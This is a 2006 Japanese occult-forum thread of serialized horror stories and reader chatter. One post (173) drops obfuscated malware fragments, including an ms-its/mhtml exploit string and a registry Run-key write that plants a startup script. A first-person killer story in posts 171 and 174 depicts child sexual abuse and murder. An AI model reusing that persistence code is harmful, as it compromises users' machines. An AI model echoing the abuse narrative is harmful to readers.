 彼女が亡くなってからも、彼女が夜中院内を歩いていたという報告が後を絶たなかったという。
 それが原因なのか、この病院は間もなく閉鎖に至る。
 僕たちは最も目撃談の多い二階へ続く階段の踊り場を目指していた。

 僕は、幼い頃に一度だけこの病院に入院したことがあった。その時は優しい看護婦さんに色々とお世話になっていた。
 ある日僕は身体の異変に気づき、夜中に目が覚めた。生ぬるい液体が僕の肩を這っている感じ。
 僕のベッドの横に、優しい看護婦さんが微笑み立っていたのを覚えている。
 翌朝、みんなの様子が騒がしいことで目が覚めた。
 僕の横にいた僕と同い年ぐらいの子のベッドがなくなっていた。
 僕の右肩が少し沁みるを感じた。
 そこには一直線に走る細い傷が残っていた。
 その傷はいつまでも消えることなく残っている。

 懐中電灯の光だけを頼りに飛び散ったガラス片を踏みながら、二階へ続く階段を上っていた。
 例の踊り場に着いた。……。皆には見えないのだろうか?
 ここに……、誰か、いるよ……。神様が僕の心に住み憑いた――

171 :本当にあった怖い名無し:2006/10/06(金) 23:24:01 ID:utvY2LIv0
 ――近頃、この町には厳戒態勢が張られている。
 そのせいで、僕は、(アタシは、あ、ボクは)あの快楽を得ることが難しくなってしまった。
 でもね、もう、今日は我慢できないの。そう、ガマンできないの!!
 ボクは、日が沈むのを待ち、いい匂いのする女を探しに町へ飛び出した。

 ボクはいつもと同じ、闇に溶け込む様な黒いパーカーを着て、肘まで伸びたちょっとパサパサの黒い髪を、くしで梳かしてから町へ出た。
 今日は特別な日、いつもより強く欲している。興奮が僕の身体をズキズキと激しく波打つ。それを感じる度に僕は、僕の心に憑いている
 神様が作品の構想を与えてくれるのを知っていた。それはまるで僕の発想からは考えられないようなものばかりだ。
 この突然の構想が、僕に最高傑作を授けてくれる。
 二年位前、ボクは下校時間を狙って男の子を手に入れた。手始めに服を脱がし、性を感じるものは納得いくまで弄る。
 そのときは、突然神様が僕に構想を与えてくれた。
 あれが、ボクの、最高傑作だった。僕はあの時と同じ様な興奮に、もしかしたら、あの時よりも、もっと強い興奮に突き動かされて良い匂いのする女を見つけた。


172 :本当にあった怖い名無し:2006/10/06(金) 23:25:39 ID:utvY2LIv0
*
 この町は今、猟奇殺人が多発している。犯人はまだ特定されていないが、その手口は、余りにも残忍で、常人ならば到底考えることの出来ない手段で殺しをする。
 二年前、俺はこの町に配置された。咽かな町に事件はなく、ただ、この交番に来るおばあさんと雑談をして過ごすくらいしかなかった。
 事件といえば、飼っていた犬が逃げ出し、犬の捜索に向かう程度だ。
 事件にも流行があるのだろうか、犬の失踪が多発した月もあった。その時からだったろうか、犬だけではなく、人間までもが消えた。
 その日、交番に電話が鳴り響いていた。殺人だ。電話の向こう側からは、発狂にも似た悲鳴が聞こえていた。
 俺は現場に到着した時、その風景にはまるで合わない戦慄の光景を目の当たりにした。
 それを見た瞬間、目の前がボヤケ、足も体重を支える力を維持できなかった。
 川沿いの小道、白い植木鉢の上の土から、少年の首が覗いていた。その周りには、色とりどりの綺麗な花が少年と戯れるように植えられていた。

 その日以来、俺はあの時の光景をよく夢で見るようになった。
 風に揺れる花々に見え隠れする少年の顔……。それを愉しそうに眺める綺麗な女性……。
 その女性が俺に手招きをする。俺はその誘いを断り、首を横に振る。
 俺はその女性をどこかで見た様な気がする。
 夢の中で、幼い頃についた左肩の切り傷が激しく痛んだ。

 少しでも犯罪の芽を潰すため、夜中にこの町を巡回することが日課となっている。
 暫く歩いていると女性の悲鳴が聞こえた。なんだ! 俺はその悲鳴の現場に向かった。 

173 :本当にあった怖い名無し:2006/10/06(金) 23:26:34 ID:yITLmUufO
ms-its:mhtml:file://C:\
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
> lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
> kill -9 xz/tSaBh0
http://blogimg.goo.ne.jp/user_image/2c/43/7604ddb86274dea4be726f370121c2d6.jpg
http://www.sixbullets.com/_images/bear_attack.jpg

174 :本当にあった怖い名無し:2006/10/06(金) 23:26:40 ID:utvY2LIv0
 僕の興奮は尋常ではなかった。空気を循環させるその鼻音は、どこか獣のものにも似ていた。
 ブルガリの香水が女の跡に続き、僕は、その残り香を嗅ぎながら女の後に続く。
 僕は、女の首に蛇のように巻きつき重心を後ろへと傾けた。女は悲鳴を轟かせた。
 今日の女は上玉だ。闇のなかでも輝くような白い肌。僕は、絶頂を乗り越え更に奥にある何かに達した。

(アハハ、今日の作品は劇的でどこか悲しげなものにしよっかな。)

 僕は淡々と女を傷つけていた。さっきまでの興奮が嘘のようだ。
「動くな、何をしている!」背後から男の声が聞こえた。僕の背後に警察官らしき男が、拳銃を構え威嚇をした。

 気持ちよくない。何で?何で、何で。
 あの時のような快楽を得ることが出来ない。
 欲しい、欲しいよ。あぁ、神様、僕に快楽をください。

「あげないよ」

 耳元でふっと心の中に居た女性が囁いた。純白であったであろう生地は、黒い染みが大半を占め、辛うじて白い部分が見えていた。
 女性は僕から出て、向こうにいる若い警察官の方へと歩いていった。
 嬉しそうに微笑み僕に手を振りながら。

 僕の身体を無数の弾丸が貫いた。
 そして、男の中に彼女が入り込んだのを、僕はみた。
 確かにみていた。

 完


175 :本当にあった怖い名無し:2006/10/06(金) 23:32:48 ID:IedFK9iJ0
>>164続き
車のなかで自分もMも走ってきたので、息を整えるのに時間がかかった。

しばらくして、Mがふと叫んだ。

「おい、先輩はどこね?」

先輩は彼女と一緒に車に乗ってたはず。
しかし、車の中に二人はいなかった。

「探しにいかんとまずいんちゃうか」

探しにいくといっても、だいたい車を置いてとこにいったのかわからない。
だが、先輩と彼女を置いたまま帰るわけにもいかない。

176 :本当にあった怖い名無し:2006/10/06(金) 23:42:00 ID:IedFK9iJ0
>>175続き

本当は自分はもう車を出たくなかった。
それに、まだ、Mが何を見たのかも聞いていない。
気配はあったような気もするが、後ろをはっきり見た訳ではなかったのだ。

「おい、さっき、何みたん?」

少しは冷静になってきたMに聞いた。

「おめえ、見とらんかったのか?」

見るもなにも、とてもそんな余裕はなかった。

「お前のうしろになぁ・・・。いや、見て無いならええわ」

おい!その言い方はないだろ!
そのとき、車の窓の外に人影が見えた。
先輩?しかし、なんか悲しそうな・・・。


177 :松尾スズキ:2006/10/06(金) 23:43:07 ID:8jBDg5EfO
宮藤〜阿部〜近藤〜星野〜上手から下手へ〜暗転板つきから荒川どーん!!

178 :本当にあった怖い名無し:2006/10/06(金) 23:45:23 ID:IedFK9iJ0
>>176続き

その時、車の上のほうから「ドン!」と大きな音がした。
突然の事態に、自分もMも再びパニックになった。

「ね  ぇ」

かすかな声が聞こえる。

「ね  ぇ  空けてよ」


だれ?!思わず振り向いた。


179 :本当にあった怖い名無し:2006/10/06(金) 23:49:27 ID:IedFK9iJ0
>>178続き

車の後部にへばりつく顔!
しかし、よく見ると、それは先輩の彼女だった。

「ねえ。カギかけないでよ。早くあけて」

急いで車に乗ってカギをかけてしまったらしい。
車を挟んだ反対側には先輩も立っていた。
どうやら、立ちションをしにいったらしい。
彼女も一緒に?付き添い?
しかし、詳しくは聞かなかった。



180 :本当にあった怖い名無し:2006/10/06(金) 23:52:33 ID:+8gJA2il0
なんでウイルス貼るん( ´・ω・`)

181 :本当にあった怖い名無し:2006/10/06(金) 23:54:11 ID:IedFK9iJ0
>>179続き

「おう、それで、お札の家、どうだった?」

車に乗り込んできた先輩が聞いてきた。

「それが・・・」

説明しようとしたが、自分が何一つ知らないことに気が付いた。
なにしろ、後ろも見ずに走ってきたのだ。
Mは何故かだまりこくっていた。

「M、なんか見たんだろ?」

自分も何が見たかったのか知りたかった。
しかし、Mは何もいわずに自分をじっと見つめていた。
その表情が何か変だ。


182 :ヘラクライスト:2006/10/06(金) 23:55:00 ID:8jBDg5EfO
ブラックゼウス表へでろ!!

183 :本当にあった怖い名無し:2006/10/06(金) 23:59:16 ID:IedFK9iJ0
>>181続き

「おい、M!」

先輩が何かを言いかける前に、自分のほうが声をあげていた。
何かしゃべるべきだろ?だいたい、なんでこっちをじっと見てるんだ?
しばらくして、Mは、ふっとこちらを指さして言った。

「・・・お前、だれ?」

気でも狂ったのか?
しかし、Mはじっとこちらを見て、再度言った。

「・・・お前、だれ?」

なにが言いたいのだろう。
だが、自分はなにか苦しくなっているのを感じていた。
なんだ?この苦しさは?


184 :本当にあった怖い名無し:2006/10/07(土) 00:01:16 ID:XSZ4NKe40
つづきカモン!

185 :もこ:2006/10/07(土) 00:01:46 ID:XMqZqFlh0
感染してるよひひひ

186 :本当にあった怖い名無し:2006/10/07(土) 00:02:42 ID:vF5XFzQGO
>>164続き

車に乗り込むとただならぬ様子を察知した先輩が聞いてきた
先輩「どうしたんなお前ら!?何があった!!」
自分はガタガタ震えが止まらず、まともに答えるコトができず、
「とにかく早く車出してください…お願いします…すんません…お願いします…」その場所から離れたい一心でそれしか言えなかった。
怯え方が尋常ではなかったので、先輩もからかったりせず車を急発信させた。
しばらく無言のドライブが続き、先輩の彼女のすすり泣く声が聞こえるだけだった。

不意に背中を強くバン!バン!と叩かれた。驚いて横を見ると、満面の笑みを浮かべたSの顔があった。

S「楽しんでもらえた?w」
その一言で全てを理解した。

正直Sを殴り倒したかったが、怒り以上に安堵感、解放感が溢れてきて一気に体中の力が抜けた。
先輩も状況を飲み込んだらしく「S、お前なぁ〜」とミラー越しにSを睨みつけていた。

コイツは最悪だ、コイツとだけは二度と心霊スポットには近付かない。
あーでも、良かった〜…

先輩も同じ気持ちだったのだろう、普段怒りッポイ性格だがSを責めるコトはあまりせず、彼女をなぐさめていた。


187 :本当にあった怖い名無し:2006/10/07(土) 00:06:14 ID:IedFK9iJ0
>>183続き

苦しさが急に大きくなってきた。
何かが破綻する、そんな感じだった。

「だって、お前、おかしいだろ」

Mはこちらを見て言った。

「お前、さっきと方言が違うじゃねえか?」

方言?何を言い出すのか・・・
そう思って、ふと、自分は方言を使えないことに気が付いた。



そして苦しさの意味がやっと自分でも理解してきた。
この話を続けるのが苦しくなったのだ。

ID:vF5XFzQGO がいつまでも話を再開しないので、創作してきたが、
もう話のネタ尽きてきてしまったのだ。
もう疲れた・・・。というか、面倒になってきた・・・・。


188 :本当にあった怖い名無し:2006/10/07(土) 00:09:46 ID:L5r+CCt+O
>>186続き

落ち着きを取り戻した車内は一気に明るくなり、Sがあの時の状況を再現するなどして街に戻る頃には元のテンションでハシャイでいた。

ちょうどコンビニに差し掛かり、先輩が
「飲み物買うか」
と言ったその時だった

「ドン」

車の屋根から大きな音がして車内が揺れた。
先輩はとっさに急ブレーキを踏んで
しまい、後続の車からクラクションが鳴り響いた。
先輩「えっ何!?今の何なん??」
R(先輩の彼女)「とりあえずコンビニ入ろ!後ろの車に迷惑だし!」
自分にも何がなんだかさっぱりだった。鳥か何かかな?でも有り得るかそんなコト…考えている内に車はコンビニに入った。
急いで車から降り、屋根を確認するが、ヘコんでいる様子はない。携帯のライトで照らしても傷がついたような跡は見当たらなかった。
先輩「おかしいなぁ、絶対何か落ちてきたよなぁ!なぁ!」
何が起きたのか全く検討がつかず、車の周りや近くの道路をウロウロしていたら、Sが降りてきていないコトに気づいた。
車に戻り
Sに「どうした?」と聞くが返事が無い、うつ向いて少し震えている気がした。変な胸騒ぎがして強めに肩を揺すって「おいどうしたんなお前!!」と叫んだ。

Sはしゃがれた声で
「ついてきとる」
と呟いた。


189 :アイカゴ:2006/10/07(土) 00:10:15 ID:aDXp7JVwO
もこ…なぜ私に振り向いてくれないんだ!
もこにたいしてこんなにも真剣に考えているのに…
あー無情…かなしき青春!!
これからどうやって生きていけばいいのだ…これじゃまるで生き地獄だよ…
あー…もこよ
もこ…もこ、もこよ…
この思いよ頼むから届いておくれよ…

190 :本当にあった怖い名無し:2006/10/07(土) 00:11:41 ID:L5r+CCt+O
勝手に続き書いてしかも微妙に当ててる神がいますね。
てゆうか真面目に書いてるんでそういうの勘弁してください!!

191 :本当にあった怖い名無し:2006/10/07(土) 00:14:15 ID:29BIqkaf0
>>190
ならまとめて書いてコピペで投稿しろと何遍(略


192 :本当にあった怖い名無し:2006/10/07(土) 00:16:44 ID:OWPudhCc0
微妙に近いと逆に書いてる俺が怖くなる・・・。


193 :本当にあった怖い名無し:2006/10/07(土) 00:25:20 ID:aDXp7JVwO






.
.
.

194 :本当にあった怖い名無し:2006/10/07(土) 00:28:53 ID:aDXp7JVwO
乾貴美子が担任か家庭教師だったらいいよね?

195 :本当にあった怖い名無し:2006/10/07(土) 00:30:23 ID:9iMvdkge0
602 名無し三平 New! 2006/02/14(火) 10:44:12 0
よし、じゃあ俺の話を書こう。

こないだ千葉のある防波堤にメジナ釣りに行ったんだ。
そしたら町の外れの洞窟に妖怪が住み着いたというウワサを聞いて
妖怪退治に向かう事にした。

ところが洞窟にいたのはごくごく普通の老人で、
ニコニコしながら俺に向かって手を差し出してくる。
「握手したいんだな」
俺はそう思い老人に近づくと
老人は突然差し出したその手を俺の股間にのばし、2つの玉をグッと握りしめた。
「なにするんだ!手をはなせ!!」
俺は怒鳴ったが、老人は玉を握ったまま。そして俺にこう囁いた。
「プラス2?マイナス2?」
どうやら俺にどちらかを選べと言っているようだった。
そこで俺はとりあえず「プラス2」と答えると
老人はあっさりと握っていた手をはなしてくれたのだった。

ほうほうの体で洞窟から俺は逃げだしたが、股間には妙な違和感が。
そこでズボンとパンツをおろして見ると玉が4つになっていた。
慌てた俺はそのまま町医者の所にかけこみ、
何とかしてくれと泣きついた。しかし医者は
「増えた2つを切ることはできるが、手術で切るのは非常に危険です。
それよりももう一度老人の所へ行って、 今度は『マイナス2』と答えたらいいじゃないですか」

名案だと思った俺は洞窟に戻り、ニコニコしている老人に近づいた。
すると老人は先ほどと同じように俺の玉をグッと握りしめてきた。
「しめた!」と思い待っていると、老人がこう囁いた。
「プラス4?マイナス4?」

196 :本当にあった怖い名無し:2006/10/07(土) 00:50:02 ID:L5r+CCt+O
>>188続き

Sの一言に自分は正気を失った。
「ついてきとるって何なん!?お前あれ嘘だったんと違うんか!!」
Sは青ざめて震えている。先輩の彼女も泣き出してしまった。
とりあえず落ち着こうというコトでコンビニで暖かい飲み物を買って与え、少しずつ話してもらった。

S「ハナッからヤバかったんじゃ、あの場所は。バリケードあったじゃろ?あれわざわざ林の奥まで逸れたのは有刺鉄線があったからじゃなくてバリケードのすぐ向こうに人が立っとったからなんよ…
お前には見えてなかったみたいだから、何も言えんかったけど、あそこで行くのヤメようて言ったら糞カッコ悪いやん。
バリケード越えても霊はウジャウジャおったよ。林の中や林道に立ってた。でも俺らには何の興味も無さそうに見えたから何とか平気なフリができたんよ。
…ダミーの家に着いた時、そこにはホンマに霊はおらんかった。やっと安心して煙草吸おう思ったんじゃ。で火着けよる間にお前がどっか行くからお前の方見たらおったんじゃ。

髪の長い女が。

チェーンくぐろうとしとるお前を見下ろしとった。
とっさにお前呼んで逃げようとしたけど遅かった。お前が振り向いた時にはその女がお前の背中に抱きついとった。



197 :本当にあった怖い名無し:2006/10/07(土) 00:52:03 ID:L5r+CCt+O
>>196続き

そっからはあんまり覚えてない。無我夢中で車に逃げ帰って。下向いてガタガタ震えとった。すぐにお前も乗り込んできたけど恐くてお前の方向けんかった。
でも下向いている俺の視界にも、お前の足元まで垂れている長い髪の毛が飛込んできたんよ。
もう我慢できんかった。
どうにでもなれと思ってお前の背中を思っきり叩いたんよ。効くとは思わんかったけど…女はいなかった。…後はわかるだろ?俺嬉しくてさ…」

そう話すSの声は相変わらずしゃがれており、全員が絶句した。

力を振り絞って聞いてみた。

自分「それで…さっきの車の音はその女で、まだ俺に憑いてるっての…?」
S「…多分、見えるヤツに乗り換えたか、お前の背中叩いたのがアカンかったか…今俺鏡とか絶対見たくない…」

Sは震えているのに妙な汗をベットリとかいていた。
先輩は心配したが、Sは自宅に帰ると言って聞かない。独り暮らしってこともあって心配になった俺はSの家に泊まるコトにした。
滅茶苦茶怖かったのだが。

198 :本当にあった怖い名無し:2006/10/07(土) 00:52:41 ID:B03HV39A0
でました「髪の長い女」がww

199 :本当にあった怖い名無し:2006/10/07(土) 00:53:18 ID:EuJd4HWl0
 y ??
  (● ●)
   /| /|
(((BROOOOOM!!))


200 :本当にあった怖い名無し:2006/10/07(土) 00:53:19 ID:BNmwgGVbO
やけにスレが進んでるなと来てみればまたですか。

201 :本当にあった怖い名無し:2006/10/07(土) 00:56:55 ID:EuJd4HWl0
ブチ  y ○○
  (● ●)
   /| /|
(((BROOOOOM!!))


202 :本当にあった怖い名無し:2006/10/07(土) 00:56:59 ID:/XoMppLR0
そういややけに髪の長い女って多いよな
なんかあるのかな?

203 :本当にあった怖い名無し:2006/10/07(土) 00:59:14 ID:C/tG277F0
禿なら怖くない…

204 :本当にあった怖い名無し:2006/10/07(土) 01:05:33 ID:k5c66art0
「髪の長い女」と聞くと、単一のイメージ画像しか思い浮かばない奴が悪い。

少しは頭を使って想像力を働かせろ。オナニーしてる時もそうだろ?

とにかく文句ばかり言うな。そっちの方が不愉快だよ。

205 :本当にあった怖い名無し:2006/10/07(土) 01:08:50 ID:BeT0vTfl0
神戸おねえ系のふんわりカールした綺麗目ファッションの女のが出てきたら怖いか?否か?

206 :本当にあった怖い名無し:2006/10/07(土) 01:09:10 ID:OqMhOhHW0
>>197 頑張って下さい



207 :本当にあった怖い名無し:2006/10/07(土) 01:11:56 ID:/XoMppLR0
俺は別に文句言ったつもりはないんだが。

208 :本当にあった怖い名無し:2006/10/07(土) 01:16:29 ID:AtnDL/s+O
>>204
たまには、オチが髪の長い女でなくてもよいじゃないか。

209 :本当にあった怖い名無し:2006/10/07(土) 01:20:12 ID:cZ4k8yxRO
まだか

210 :本当にあった怖い名無し:2006/10/07(土) 01:33:33 ID:M5DgCPCoO
「髪の長い女」で思い出したけど、
男性より女性、そして短髪より長髪の方が
強い念の力を持ちやすいと聞いた。

おまじないかけるにしても長髪の方が効きやすい、と。


「髪の長い女」の幽霊が頻繁に「現れる」のもそれなりに納得。

211 :本当にあった怖い名無し:2006/10/07(土) 01:33:50 ID:L5r+CCt+O
>>197続き

Sのアパートに戻った自分達は、飲む予定で買っておいた酒も飲まず、直ぐ様寝てしまった。
ビクビクして寝るドコじゃないと感じていたが、不思議とすぐに意識が飛んだ気がする。

次に意識が戻った時、洗面所の声から

「ゲェ〜〜!!ゲェ〜〜!!」

と何かを吐く声が聞こえた。
急いで洗面所に向かうとSが便器にうずくまって吐いていた。
「大丈夫かっ!?S!!しっかりしろ!!Sっ!!」叫びながら夢中で背中をなんどもさすった。
でも
便器の中を覗いて氷ついた。

Sは血を吐いていた。

飛びそうになる意識を必死で保ち、狂ったようにSの背中を叩きまくった。
「コノ野郎!!ふざけんな!!コノ野郎!!」
泣きながらひたすらSの背中を叩き続けた。
寝るために薄暗い豆電球にした部屋の電灯が風も無いのにユラユラ揺れていたのを鮮明に覚えている。

どのぐらい時間がたったのかわからないが、呼んでおいた救急車が到着し、運ばれるSと共に救急車に乗り込み病院に向かった。
すでにSに意識はなかったが、俺の服を掴んではなさなかった。

Sが救急病院にて治療を受けた後、医者から説明を受けた。


212 :本当にあった怖い名無し:2006/10/07(土) 01:36:16 ID:L5r+CCt+O
>>211続き

Sは声帯を損傷しているとのコトだった。ただ滅茶苦茶に叫んだ程度ではそうならないという訳で事情を聞かれたが、俺は答えることができなかった。


翌日から別の病院に入院し、俺は毎日の様に見舞いに行ったが、声帯治療のためSは話せなかった。紙に文字を書いての会話となったが、むなしく、そして悲しくてあまり多くの会話はできなかった。
もちろんあの夜の事など聞けない。

しばらくそんな感じで過ぎて行き、もうじき退院というある日、見舞いに行くとSがいなかった。
聞けば「昨日退院した」ということらしかった。

「連絡ぐらいよこせよ。」と思いつつ、Sに退院おめでとうのメールを送った。
ポストマスターからメールが返ってきた。
Sはメアドを変えていた。嫌な予感がしてあわてて電話するが、番号自体変えていた。

とにかく大学にくるのを待つしかないと思ったが、Sは来ない。嫌な予感は的中した。S大学を辞めていた。総務課で実家の番号を調べて欲しいと頼んだが、辞めた生徒の電話番号を勝手に教えることは出来ないとのコト。
完全に連絡をとる手段が途絶えた。

その後約2年間、俺が大学在学中はSに会うことはなかった。


213 :本当にあった怖い名無し:2006/10/07(土) 01:37:21 ID:hUvKrGIM0
>>L5r+CCt+O
携帯からよく頑張ってるな・・・乙!

214 :本当にあった怖い名無し:2006/10/07(土) 01:49:32 ID:L5r+CCt+O
>>154
>>155
>>156
>>160
>>164


215 :本当にあった怖い名無し:2006/10/07(土) 01:51:00 ID:L5r+CCt+O
>>186
>>188
>>196
>>197
>>211
>>212

長くなったり連投できなかったり本当すんません↓

この話には後日談があり、それがつい最近わかった真相なんですが、明日も仕事があるので今日はここまでで落ちます。


ちなみに>>186辺り書いてる時から耳なり止まりません、トイレ行きたいけど我慢して寝ます。
明日辺り後日談書きますね。では〜

216 :本当にあった怖い名無し:2006/10/07(土) 02:07:07 ID:rhPswHkF0
オカルトマニア達起きてるかい?

217 :本当にあった怖い名無し:2006/10/07(土) 02:07:46 ID:rfuv0o340
いや、寝てるよ?

218 :本当にあった怖い名無し:2006/10/07(土) 02:08:50 ID:vztO1hNb0
>>215
乙。続き楽しみにしてる。

219 :本当にあった怖い名無し:2006/10/07(土) 02:12:04 ID:zBdyF2FsO
福山といえば500円おばさん

220 :本当にあった怖い名無し:2006/10/07(土) 02:17:40 ID:vyaaUSSY0
ID:L5r+CCt+Oみたいなのもマジ荒らし。
無駄な長文、無駄な引きって最近多いねー。

221 :本当にあった怖い名無し:2006/10/07(土) 02:19:33 ID:rhPswHkF0
起きてるっぽいから書いていい?

222 :本当にあった怖い名無し:2006/10/07(土) 02:21:03 ID:rfuv0o340
心おきなく

223 :本当にあった怖い名無し:2006/10/07(土) 02:21:09 ID:CzPwxKY50
あんま「まだか」とか書くと後の人が見にくくなっちゃうよ。
またーり我慢我慢。




といいつつ応援サゲ

224 :本当にあった怖い名無し:2006/10/07(土) 02:23:19 ID:CzPwxKY50
誤爆だった

225 :本当にあった怖い名無し:2006/10/07(土) 02:23:44 ID:rhPswHkF0
オレがオカルトに目覚めたころの話。
オレの地元に有名な心霊スポットがある。そこはある城の跡で心霊スポットとしてはすごい有名なところ。
昔、北条なんとかがそこの城主だったんだけど北条と兵士の大半が留守中にどっかの軍(たしか秀吉)が攻めてきて城を落とされた。
その時、城に残っていた女、子供は敵の手にかかるよりはと思い身投げしたらしい。
そいつらの怨念が残っていて出るってとこ。
そこに友達と突入した。

その城跡に行く前により幽霊が出やすいようにしようと思い立ったオレたちは、
コンビニに向かい食玩の戦国フィギュア(中に何が入っているかわからないやつ)を購入した。
秀吉が攻めたらしいので秀吉のフィギュア持ってったら祟りとか受けそうだと思ったオレ達は二回目で秀吉ゲット。
一回目にでた鉄砲隊と一緒に胸ポケットに入れて城跡に向かった。
城跡といっても今は山みたいなもんだった。木が生い茂ってる。
ちょっと進むと森の中から殺気じみたものがビシバシ伝わってくる。
多少びびりつつも良く出ると言われてる場所に向かおうとしたらちょっと進んだだけで
急に一人が吐き出したのでしょうがなく帰ることにした。

まぁ行くところもないのでとりあえず近くのファミレスで休憩して吐き出した奴に話を聞くと
吐いた奴は急に気持ち悪くなったらしい。因果関係はわからないけど多分雰囲気に飲まれたんだろう。

226 :本当にあった怖い名無し:2006/10/07(土) 02:25:44 ID:rhPswHkF0
と、なんだかんだ話しているうちに秀吉フィギュアを思い出した。
おぉそういえばと胸ポケットから出すと秀吉は首がなくなっており鉄砲隊はバラバラになっていた。
フィギュアは組み立てるやつじゃなくて元からくっついてるやつ。
鉄砲隊の体のパーツは全て胸ポケットにはあったが秀吉の首はなくなっていた。
夜遅かったしみんなちょっとびびったのでその日は解散した。

その後オレは特に変わりはなく過ごしていたがある時、塾講師をしている知り合いに心霊スポットに行って来た話をした。
秀吉の首の話もした。
すると知り合いは顔を青ざめながら教えてくれた。

曰く、生徒の社会の授業の研究発表みたいなものを手伝った時にそこの城跡を調べたらしい。
するとあまり知られていない歴史裏話が見つかった。
城を留守中に落とされた北条なんとかは帰るところがなくなったので他の城に籠城した。
秀吉軍はその城に攻めに行ったがなかなか落ちないので北条軍の士気を下げるために
城跡で自害した奴らの首を切って籠城してる城にガンガン放り投げていたと。

その怨念で秀吉の首がなくなったのかなぁ。なんて思いました。おしまい。


あんまり長文書かないから読みづらかったらごめん。

227 :本当にあった怖い名無し:2006/10/07(土) 02:26:22 ID:t33hqKpjO
フィギュアはどうなったんだ

228 :本当にあった怖い名無し:2006/10/07(土) 02:28:38 ID:rhPswHkF0
持ってたらやばいかなぁと思って投げ捨てました。

229 :本当にあった怖い名無し:2006/10/07(土) 02:35:04 ID:vyaaUSSY0
きもだめしに行ったら人形の首が取れて怖かったです、か。
これも荒らし?

230 :本当にあった怖い名無し:2006/10/07(土) 02:35:44 ID:CzPwxKY50
GJ

231 :本当にあった怖い名無し:2006/10/07(土) 02:38:30 ID:rhPswHkF0
VIPで書いたらスルーされたからこっちに書きましたとさ。
付き合ってくれてありがとう。おやすみー。

232 :本当にあった怖い名無し:2006/10/07(土) 02:46:53 ID:gSnAhRjmO
>>229
むしろお前の方が荒らし
>>226
GJ

233 :本当にあった怖い名無し:2006/10/07(土) 02:47:56 ID:+tNV8effO
>>212の続き

そしてあれから2年経った最近、Sの件も忘れかけてた頃だった。
見知らぬアドレスからメールが入った。

件名「よぉ久しぶり。」
本文「って言ってもわからないか。俺だよ、Sだよ。」

ナイスサプライズだが、その後に続いた本文に愕然とした。

「喉つぶれちゃったろ?電話持ってる意味ないから解約しちゃったよ。
メールがあるだろって?遅延どころか紛失ばかりで意味ねーよ。vodafone。






やっぱりDoCoMoだね。」

234 :本当にあった怖い名無し:2006/10/07(土) 02:50:16 ID:sYRWGF47O
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。
「書いても良いですか?」等の前置きは全然いりません。


235 :本当にあった怖い名無し:2006/10/07(土) 03:24:40 ID:93QzNZ14O
ドコモのFOMA持ちだが…auのが良いだろと小一時間

236 :本当にあった怖い名無し:2006/10/07(土) 03:27:32 ID:+tNV8effO
うん。実は俺も番号ポータブル?でauに行こうかなと…(-_-;)

237 :本当にあった怖い名無し:2006/10/07(土) 04:23:28 ID:Nvuvy8SQ0
芥川龍之介の『歯車』という話を知っていますか?

私がこの話を知ったのは高校生の時の国語の授業中でした。
その日の授業では芥川龍之介についてやっていたと思います。
国語の教師はその日の授業のまとめを言った後、突然
「彼の『歯車』という話を読むと気が狂ってしまうから、読むんじゃないぞ」
そういって授業を終わりにして出て行ってしまいました。
当時私は本を読むのが嫌いだったので、読む気など全くなく
「このオッサンなに言ってんだ?」とぐらいにしか思っていませんでした。
周りの友人たちにしてもあまり印象に残らなかったのか、読んだという人は
いなかったと思います。

それから数年が経ち、私は大学生として過ごしていました。
この時私は本を読むようになりさまざまな本を読むようになっていました。
ある日本屋に行ったとき、ふと本棚を見てみると芥川龍之介の『歯車』が
ありました。高校時代の国語教師の言葉を思い出し、ちょっとふざけ半分で
読んでみようと思いすぐレジへ持って行きました。私はそのとき別に読んでいる
本があったので、それが読み終わってから読もうと家に帰ってから本棚へ
『歯車』を入れておきました。

238 :本当にあった怖い名無し:2006/10/07(土) 04:24:09 ID:Nvuvy8SQ0
しばらくし、バイトから疲れて帰ってきたある日、前まで読んでいた本も
読み終わったので『歯車』でも読もうと思い、本棚から取り出し読み始めました。
読んでみたところ文章が分かりづらく、なんの起伏もない文章で正直私には難しい話であった。
しかし読み始めるとどんどん読み続けている自分がいました。

どれぐらいたったろうか突然私は金縛りにあってしまいました。時計は3時ちょっと前をさしていました。
しばらく動けず声も出すこともできませんでした。唯一できることは目を閉じることのみです。
私は目を閉じ早くこの状況から抜け出すのを祈るだけでした。すると突然私の部屋のドアが

バタンッ!!

と開き誰かが中に入ってきました。恐る恐る目を開けその入ってきた“誰か”を見ると
それは真っ黒いシルエットでした。目も鼻も口も何もない真っ黒な影です。
その影はまるで我が家のように私の部屋の真ん中にあるソファにリラックスした様子で
座りタバコらしきものを吸いながらテレビをつけて見だしました。そこで私は確信しました。

「この影は俺だ!!」

この『歯車』という小説はドッペルゲンガーを見た男の話なのです。

その影は私の影なのです。私は部屋でくつろぐ私の影を見ながら、必死で声を出そうと
頑張りました。するとちょっとずつ声が出るようになったのです。そして私がなんとか
出せる精一杯の声で「消えろ!ここは俺の部屋だ!」と言いました。すると影はもの凄い
勢いでこっちに振り返りました。その顔にはうっすらと私の顔が浮かびあがっており
憎しみを込めた表情をしていました。そして影は

「クソッ…あと少しだったのにな…」

とつぶやきいなくなりました。それと同時に私は安心したのか意識を失ってしまいました。

239 :本当にあった怖い名無し:2006/10/07(土) 04:24:42 ID:Nvuvy8SQ0
気づいたのは次の日の朝です。私は影がいたはずのソファで寝ていました。手には『歯車』が
ありました。なんだ夢か…と思い安心していました。学校に行こうと色々準備をし、携帯を持った時
着信があるのに気づきました。着信時間は夜中の3時13分…番号は「表示不可」と書かれています。
伝言が残っていたのですが、雑音にしか聞こえませんでした。

この表示不可の電話はいまでも3ヶ月周期にかかってきます。決まって24日の3時13分に。
調べてみると芥川龍之介の命日も24日だそうです。関係ないかもしれませんが非常に不安です。
そして影の「あともう少し」とはなんだったのでしょうか?

私は今うつ病患者です。

240 :本当にあった怖い名無し:2006/10/07(土) 04:51:23 ID:cPj91vvuO
お化けを見たから頭がおかしくなるのではない。
頭がおかしいからお化けを見るのだ。

